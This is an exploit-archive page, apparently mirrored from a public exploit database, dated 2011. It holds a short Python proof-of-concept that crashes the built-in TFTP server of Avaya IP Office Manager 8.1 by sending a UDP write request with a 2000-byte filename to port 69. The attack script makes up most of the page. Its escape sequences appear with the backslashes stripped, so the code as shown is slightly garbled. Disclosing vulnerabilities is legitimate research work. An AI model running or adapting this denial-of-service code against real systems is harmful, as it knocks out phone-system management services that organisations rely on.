Avaya IP Office Manager 8.1 TFTP DOS

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Avaya IP Office Manager 8.1 TFTP DOS
# Published : 2011-03-24
# Author :
# Previous Title : Microsoft Windows xp AFD.sys Local Kernel DoS Exploit
# Next Title : Microsoft Reader <= 2.1.1.3143 Array Overflow

#Exploit Title: Avaya IP Office Manager TFTP DOS
#Version: Avaya IP Office Manager 8.1 (5)
#Author: Craig Freyman (cd1zz)
#Date: March 23, 2011
#Description: Avaya IP Office Manager is the management console for Avaya IP Office phone systems. 
#There is a built in TFTP server that is used to update the firmware on phones. The TFTP service 
#is loaded when the admin console is opened. I was not able to overwrite any registers or the SEH.
#Software Link: ftp://ftp.avaya.com/incoming/Up1cku9/SoftwarePub/6_1GA_Builds/ADMIN6_1_5.exe
#Tested on: Windows XP SP3

#!/usr/bin/python
import socket

host = '192.168.133.131'
port = 69

s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)

crash = "A" * 2000

print "Sending crash...."
pwned = "x00x02" + "A" + "x00" + crash + "x00"
s.sendto(pwned, (host, port))